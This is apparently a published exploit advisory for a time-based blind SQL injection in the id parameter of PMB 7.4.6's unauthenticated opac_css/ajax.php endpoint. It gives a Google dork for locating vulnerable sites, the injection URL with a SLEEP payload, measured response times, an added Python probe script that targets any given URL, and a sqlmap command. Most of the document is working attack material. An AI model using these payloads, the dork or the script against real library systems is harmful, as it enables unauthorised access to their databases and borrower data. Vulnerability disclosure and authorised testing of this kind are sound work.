# Exploit Title: PMB 7.4.6 - SQL Injection
# Google Dork: inurl:opac_css
# Date: 2023-01-06
# Exploit Author: str0xo DZ (Walid Ben) https://github.com/Str0xo
# Vendor Homepage: http://www.sigb.net
# Software Link: http://forge.sigb.net/redmine/projects/pmb/files
# Affected versions: <= 7.4.6

-==== Software Description ====-

PMB is a completely free ILS (Integrated Library management System). The domain of software for libraries is almost exclusively occupied by proprietary products. We are some librarians, users and developers deploring this state of affairs.

PMB is based on web technology, what is sometimes called a 'web-app'. PMB requires an HTTP server (such as Apache, but this is not an obligation), the MySQL database and the PHP language.

The main functions of PMB are:

* Support for the UNIMARC format
* Authorities management (authors, publishers, series, subjects...)
* Management of loans, holds, borrowers...
* A user-friendly configuration
* The ability to import full bibliographic records
* A user-friendly OPAC integrating a browser
* Loans management with a module designed to serve even the very small establishments
* Serials management
* Simple administration procedures that can be handled easily even by the library staff...

-==== Vulnerability ====-

URL:

https://localhost/opac_css/ajax.php?categ=storage&datetime=undefined&id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))SHde)&module=ajax&sub=save&token=undefined

(The payload is shown unencoded for readability; when sent, the id value must be URL-encoded, e.g. spaces as %20 or +.)

Parameter:

id (GET, unauthenticated OPAC endpoint). The injection is time-based blind: MySQL SLEEP() inside the injected expression delays the response by the requested number of seconds, which is the only observable signal.

-==== Vulnerability Details ====-

URL-encoded GET input id was set to if(now()=sysdate(),sleep(6),0). The condition now()=sysdate() is normally true, so the server evaluates sleep(N) and the response arrives about N seconds later; with sleep(0) the request returns in the normal time, which gives the baseline latency.

Tests performed (payload => response time in seconds):

if(now()=sysdate(),sleep(15),0) => 15.43
if(now()=sysdate(),sleep(6),0) => 6.445
if(now()=sysdate(),sleep(15),0) => 15.421
if(now()=sysdate(),sleep(3),0) => 3.409
if(now()=sysdate(),sleep(0),0) => 0.415
if(now()=sysdate(),sleep(0),0) => 0.413
if(now()=sysdate(),sleep(6),0) => 6.41

The response time tracks the requested sleep with a constant overhead of roughly 0.4 s, and the sleep(0) requests return at that baseline, so the delay is caused by the injected SQL rather than by server load.

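The timing methodology above, automated as an added example that is not part of the original advisory and is not PMB code. It sends if(now()=sysdate(),sleep(N),0) in the id parameter for several N, interleaves sleep(0) requests to re-sample the baseline, and decides from the measured times whether the delay is attributable to the injection. BASE_URL, the 1-second tolerance and the chosen delay sequence are assumptions; ADVISORY_SAMPLES are the timings published above, embedded so the decision logic can be exercised offline.

```python
"""Time-based blind SQL injection probe for the PMB opac_css/ajax.php `id` parameter.

Added example, not part of the original advisory or of PMB itself. It automates
the advisory's methodology: send if(now()=sysdate(),sleep(N),0) for several N
and check that the response time tracks N. BASE_URL and the 1-second tolerance
are assumptions; the timings in ADVISORY_SAMPLES are copied from the advisory.
"""
import sys
import time
import urllib.parse
import urllib.request
from typing import Callable, List, Tuple

# Assumed target; the advisory shows both /opac_css/ and /pmb/opac_css/.
BASE_URL = "http://localhost/pmb/opac_css/ajax.php"

# (requested sleep, observed response time) pairs as reported in the advisory.
ADVISORY_SAMPLES = [(15, 15.43), (6, 6.445), (15, 15.421), (3, 3.409),
                    (0, 0.415), (0, 0.413), (6, 6.41)]


def build_url(base_url: str, seconds: int, value: str = "1") -> str:
    """Return the GET URL with the time-based payload URL-encoded into `id`.

    The other parameters mirror the request in the advisory; `value` is the
    legitimate id the injected expression is appended to.
    """
    payload = f"{value} AND if(now()=sysdate(),sleep({seconds}),0)"
    query = {
        "categ": "storage",
        "datetime": "undefined",
        "id": payload,
        "module": "ajax",
        "sub": "save",
        "token": "undefined",
    }
    return base_url + "?" + urllib.parse.urlencode(query)


def timed_get(url: str, timeout: float = 60.0) -> float:
    """Fetch `url` and return the wall-clock seconds until the body is read."""
    start = time.monotonic()
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        resp.read()
    return time.monotonic() - start


def classify(samples: List[Tuple[int, float]], tolerance: float = 1.0) -> str:
    """Decide whether the (delay, elapsed) samples show an injected sleep.

    baseline   = slowest sleep(0) response, i.e. the server's own latency.
    vulnerable = every sleep(N) response is at least N - tolerance seconds
                 slower than the baseline.
    Returns "inconclusive" when the baseline is too close to the smallest
    requested delay to tell an injected sleep from an overloaded server.
    """
    zero = [e for d, e in samples if d == 0]
    positive = [(d, e) for d, e in samples if d > 0]
    if not zero or not positive:
        raise ValueError("need at least one sleep(0) and one sleep(N>0) sample")
    baseline = max(zero)
    if baseline + tolerance >= min(d for d, _ in positive):
        return "inconclusive"
    for delay, elapsed in positive:
        if elapsed - baseline < delay - tolerance:
            return "not vulnerable"
    return "vulnerable"


def probe(measure: Callable[[int], float],
          delays: Tuple[int, ...] = (0, 3, 0, 6, 15)
          ) -> Tuple[str, List[Tuple[int, float]]]:
    """Run the timing test. `measure(N)` must return the response time for sleep(N).

    Zero-delay requests are interleaved so the baseline is re-sampled between
    sleeps, which catches a server that is merely getting slower over time.
    """
    samples = [(d, measure(d)) for d in delays]
    return classify(samples), samples


def measure_remote(seconds: int, base_url: str = BASE_URL) -> float:
    """Network-backed `measure` for probe(): one request against the target."""
    return timed_get(build_url(base_url, seconds))


if __name__ == "__main__":
    # Offline: re-evaluate the timings published in the advisory.
    print("advisory samples:", classify(ADVISORY_SAMPLES))
    # Online: pass a base URL to probe a live instance you are authorised to test.
    if len(sys.argv) > 1:
        verdict, samples = probe(lambda n: measure_remote(n, sys.argv[1]))
        for delay, elapsed in samples:
            print(f"sleep({delay}) => {elapsed:.3f}s")
        print("verdict:", verdict)
```

Run it with no arguments to see the verdict for the advisory's own numbers, or with a base URL to probe a live target. The interleaved sleep(0) requests matter: a slow or overloaded server raises the baseline, and when the baseline gets within the tolerance of the smallest requested delay the probe reports "inconclusive" instead of a false positive.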
Using sqlmap:

sqlmap -u "http://localhost/pmb/opac_css/ajax.php?categ=storage&datetime=undefined&id=1&module=ajax&sub=save&token=undefined" -p "id"

The URL carries a benign id=1 and -p "id" restricts testing to that parameter; sqlmap confirms the injection with its time-based blind technique.